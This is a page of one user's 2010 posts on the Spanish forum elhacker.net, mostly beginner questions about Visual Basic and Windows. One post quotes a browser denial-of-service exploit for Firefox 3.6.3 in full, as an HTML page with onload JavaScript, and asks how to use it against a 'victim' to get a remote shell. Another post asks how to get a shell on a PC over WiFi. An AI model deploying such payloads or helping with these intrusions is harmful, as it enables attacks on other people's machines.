elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Temas
Páginas: 1 2 3 4 5 [6] 7
51  Seguridad Informática / Seguridad / Duda sobre mi seguridad en internet en: 23 Septiembre 2010, 13:02 pm
Hola tengo una duda... queria a ver si me la podian explocar: Si tengo todos los puertos cerrados de mi ordenador... alguien puede acceder a el??(usando expoits)

Pienso que al no tener puertos abiertos el exploit no funcionara.. pero no estoy seguro me gustaria que me explicaran esta cuestion..

Un saludo y muxas gracias!!
52  Seguridad Informática / Bugs y Exploits / Como utilizo este sploit en: 18 Septiembre 2010, 18:15 pm
Código:
================================
Mozilla Firefox 3.6.3 Remote Dos
================================


# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:Mozilla Firefox 3.6.3 Remote Dos
# Software Link:http://www.mozilla-europe.org/es/firefox/
# Version: v3.6.3
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____    _____                      _ _         
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


Lo Guardamos como un html y lo subimos algun host

Exploit
-----------------------------------------

<body onload="javascript:bufov();"></body>
 
<script>
 
function bufov() {
var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
document.write('<html><marquee><h1>'+b+b);

}
 
}
 
</script>



# Inj3ct0r.com [2010-06-16]

Hola,  quería saber como puedo utilizar este exploit... He creado un servidor apache y en el index.html lo he editado y he puesto el código del exploit que pone ... pero una vez que la victima abra el exploit ¿¿¿que debo hacer??? Se supone que es para conseguir una consola remota(al menos es lo que dice).
Muchas gracias!!!
53  Sistemas Operativos / Windows / Para que sirve este archivo de windows?? en: 12 Septiembre 2010, 13:14 pm
El archivos services de esta rama de carpetas...
Lo abri con blog de notas y salen multiples servicios...
La pregunta es que si tiene una utilidad o es solo para mostrar todos los servicios que tiene...

C:\WINDOWS\system32\drivers\etc\services

Gracias!!!
54  Programación / Programación Visual Basic / Duda con TabStrip en: 28 Julio 2010, 18:04 pm
Hola queria saber si hay alguna fotma de cambiar el fondo de el Tab Strib que hay en Microsoft Windows Common Controls 6.0

Gracias!!! Un saludo
55  Programación / Programación Visual Basic / Saber el ping que hay de una direccion ip a la mia en: 14 Julio 2010, 18:22 pm
Hola estaba buscando el ping en vb.. y resulta que me encontre con esto:
http://support.microsoft.com/kb/300197/es
No hay ningun codigo para saber el ping mas corto??

Gracias!!

PD: yo habia pensado utilizar el ping de Windows el problema esk necesito que lo muestre asi:
Ping = 5 m/s por ejemplo
gracias!!
56  Seguridad Informática / Hacking / Que puedo hacer conectado a traves de WIFI a la otra pc??? en: 14 Julio 2010, 17:57 pm
No es para hacerle daño si no por curiosidad.
Me refiero a si puedo conseguir una shell o ver los archivos que tiene.

Gracias!!

PD: Tengo acceso al router.
57  Programación / Programación Visual Basic / Como puedo saber el sistema operativo que esta usando en: 13 Julio 2010, 22:04 pm
Esque necesito saber como mostrar en un msgbox el sistema operativo utilizado en vb 6.
El problema esk e visto codigos pero solo muestran si es como muxo un XP no hay ningun codigo que sea asta 7.. y QUERIA saber como añadir a esos codigos el vista y el win7
gracias!!!
un saludo!!
58  Programación / Programación Visual Basic / [Ayuda] codigo para vb 6 en: 9 Julio 2010, 21:05 pm
Alguien conoce de algun codigo que te diga el nombre del pais de una IP??
Es decir una especie de GeoIP...

Graciasss!!
59  Seguridad Informática / Análisis y Diseño de Malware / Pregunta sobre conexiones y puertos... en: 6 Julio 2010, 19:55 pm
Hola tenia una pregunta sobre las conexiones...

Esk el otro dia probando un troyano me di cuenta que un colectivo de servidores puede conectarse a un cliente con el mismo puerto...
Alguien me puede explicar como realizan esta operacion de conectarse a traves del mismo puerto?
Resulta que lo intente con un puerto aleatorio a la escucha con WINSOCK (VB) y si me conectaba con el cliente... pero cuando intentaba establecer 2 conexiones con el cliente no me dejaba(ya que el puerto esta ocupado)
¿Como lo puedo realizar para que conecte?

Gracias!!
60  Programación / Programación Visual Basic / Crear una tabla. en: 6 Julio 2010, 15:59 pm
Alguien puede explicarme como crear una tabla de este tipo:

Páginas: 1 2 3 4 5 [6] 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines